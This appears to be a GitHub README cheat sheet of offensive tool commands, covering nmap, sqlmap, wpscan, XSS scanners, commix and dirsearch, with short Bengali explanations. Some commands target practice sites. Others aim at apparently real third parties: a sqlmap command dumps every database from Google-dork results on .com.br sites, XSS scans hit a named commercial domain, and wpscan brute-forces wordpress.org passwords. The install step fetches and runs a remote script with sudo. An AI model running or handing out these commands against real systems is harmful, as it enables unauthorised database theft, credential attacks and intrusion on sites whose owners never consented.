nmap

install

sudo rm -rf install.sh
sudo wget https://raw.githubusercontent.com/freelancermijan/install/refs/heads/main/install.sh
sudo chmod +x install.sh
./install.sh

nmap

useful command

nmap -sV -sC -F 10.10.32.221

nmap -A -T5 -p- --script vuln 10.10.08.152

টার্গেট আইপির ক্ষেত্রে:

Single টার্গেট আইপি চেক: এখানে আইপি এর জায়গায় টার্গেট হোস্ট scanme.nmap.org দিতে পারবেন

nmap 45.33.32.156

একাধিক টার্গেট আইপি চেক: একাধিক আইপির ক্ষেত্রে প্রতিটা আইপি এর পরে একটি করে space দিতে হবে

nmap 45.33.32.156 48.33.32.126 50.33.31.156

নির্দিষ্ট রেঞ্জ range এর আইপি চেক: এখানে ১৫৬ থেকে ১৬০ পর্যন্ত মোট ৫ টি আইপি চেক করবে.

nmap 45.33.32.156-160

অনেক গুলো আইপি যদি ফাইল আকারে save করা থাকে তাহলে ফাইলের ভোতরের আইপি গুলো চেক করার কমান্ড: সেক্ষে আইপি যুক্ত ফাইল এর লোকেশন টি সঠিক ভাবে দিতে হবে.

nmap -iL /home/hunter/Desktop/multiple-ip.txt

আইপি গুলো file_name.txt ফাইলের ভেতরে প্রতিটি লাইনে একেক টি করে থাকতে হবে.

45.33.32.157
45.33.32.158
45.33.32.159
45.33.32.160

sqlmap

parameter finding google dork

site: .com.br inurl: .php?id=1

auto crawling command

sqlmap -u "http://testphp.vulnweb.com/" --crawl 3 --batch --threads 5 --random-agent --risk 1 --level 1 -o sqlcrawl.txt

auto dumping databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all --batch --threads 7 -o /tmp/sqldumldataauto.txt

finding vuln parameter using google dork

sqlmap -g "site: .com.br inurl: .php?id=1" --dump-all --batch --threads 7 -o /tmp/sqldumldataauto.txt

Step by step dumping databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch --threads 5 -o /tmp/sqldumpfulldatabase.txt

Step by step dumping databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch --threads 5 -o /tmp/sqldumpfulltable.txt

Step by step dumping databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch --threads 5 -o /tmp/sqlreadallcolumnsdata.txt

Step by step dumping databases

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users -C uname --dump --batch --threads 5 -o /tmp/sqldumpfullcolumns.txt

Login page brute-forcing

sqlmap -u "http://testphp.vulnweb.com/login.php" --forms -o /tmp/sqlbruteForcelogin.txt


sqlmap -u "http://testphp.vulnweb.com/userinfo.php" --data="uname=abd&pass=abc&login=submit" --dbs

Sub Domain finding automation

Sub Domain finding automation using assetfinder, httpx

assetfinder -subs-only vulnweb.com | httpx -ip -random-agent -silent | tee /tmp/validsubDomains.txt

CMS Detector

auto Detecting

cmseek -u https://wordpress.org --batch | tee '/tmp/cmsDetector.txt'

Gospider

Paramiter finding

gospider -s "https://www.farmasilva.com.br" --no-redirect -o /tmp/gospider.txt

XSStrike, xss finder

xss finding

xsstrike -u "https://www.farmasilva.com.br/search?search_query=query" -f /usr/share/wordlists/SecLists/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt

XSpear, xss finder

xss finding

XSpear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2 -o /tmp/XSpear.txt

commix, xss finder

os command injection finding

commix -u 'http://192.168.31.177/vulnerabilities/exec/#' --cookie="security=low; PHPSESSID=hcjrgadiie5f40vup73ehe0fu7; security=low" --data="ip=INJECT_HERE&Submit=Submit"

wpscan

Vulnerable plugin, themes, users

wpscan --url https://wordpress.org -e vp,vt,u -o /tmp/scanned.txt

Vulnerable plugins, All plugins, Vulnerable themes, All themes, Timthumbs, Config backups, Db exports, User, Media, Bypassing Simple WAFs

wpscan --url https://wordpress.org -e vp,vt,tt,cb,dbe,u,m --random-user-agent -v -o /tmp/scanned.txt

Password brute force attack

wpscan --url https://wordpress.org -e u --passwords /usr/share/wordlists/rockyou.txt -o /tmp/scanned.txt

finding flag from system

find / -type f -name '*flag*.txt' 2>/dev/null

Usage of Dirsearch

Most used

sudo dirsearch --full-url --extensions=php,html,js --exclude-extensions=xml,ico --include-status=200-399 --exclude-status=400 -r 3 --format plain -o /tmp/dirsearchScan.txt -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full URL & plain text output scan

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -u http://testphp.vulnweb.com

Full url, plaintext output, custom wordlist

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full url, plaintext output, wordlist, add extensions

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -e php,html,js -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full url, plaintext output, wordlist, add extensions & exclude extension

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -e php,html,js -X xml -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

above all + status code

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -e php,html,js -i 200,302 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

above all + Exclude Extensions

sudo dirsearch --full-url --format plain -o /tmp/dirsearchScan.txt -e php,html,js --exclude-extensions=xml,ico -i 200,301 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full url, output plzintext, include extension, exclude extension, status code, recursive mode

sudo dirsearch --full-url --format plain -o /tmp/scan.txt -e php,html,js --exclude-extensions=xml,ico -i 200,301 -r 3 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full url, output plzintext, include extension, exclude extension, status code, recursive mode+loop

sudo dirsearch --full-url --format plain -o /tmp/scan.txt -e php,html,js --exclude-extensions=xml,ico -i 200,301 -r --deep-recursive 3 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Full url, output plzintext, include extension, exclude extension, status code, recursive mode+loop, threads

sudo dirsearch --full-url --format plain -o /tmp/scan.txt -e php,html,js --exclude-extensions=xml,ico -i 200,301 -r --deep-recursive 3 -t 20 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://testphp.vulnweb.com

Usage of Dalfox

Automatic detecting vuln params

dalfox url "http://testphp.vulnweb.com/listproducts.php" --waf-evasion --report -o scan_dalfox.txt

single target with custom payload

dalfox url "http://testphp.vulnweb.com/listproducts.php" --custom-payload /usr/share/wordlists/SecLists/Fuzzing/XSS/xss-common.txt --waf-evasion --report -o scan_dalfox.txt

Bulk file

dalfox file param.txt

Bulk file with custom payload

dalfox file param.txt --custom-payload /usr/share/wordlists/SecLists/Fuzzing/XSS/xss-common.txt

Name		Name	Last commit message	Last commit date
Latest commit History 72 Commits
images		images
README.md		README.md
Recon-online.md		Recon-online.md
Sqlmap-auto&manual.md		Sqlmap-auto&manual.md
ctf.txt		ctf.txt
dorks.md		dorks.md
ffuf.md		ffuf.md
gf tools installation.txt		gf tools installation.txt
hunting.md		hunting.md
install.md		install.md
install.sh		install.sh

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

install

nmap

sqlmap

Sub Domain finding automation

CMS Detector

Gospider

XSStrike, xss finder

XSpear, xss finder

commix, xss finder

wpscan

Usage of Dirsearch

Usage of Dalfox

About

Uh oh!

Releases

Packages

Languages

freelancermijan/install

Folders and files

Latest commit

History

Repository files navigation

install

nmap

sqlmap

Sub Domain finding automation

CMS Detector

Gospider

XSStrike, xss finder

XSpear, xss finder

commix, xss finder

wpscan

Usage of Dirsearch

Usage of Dalfox

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages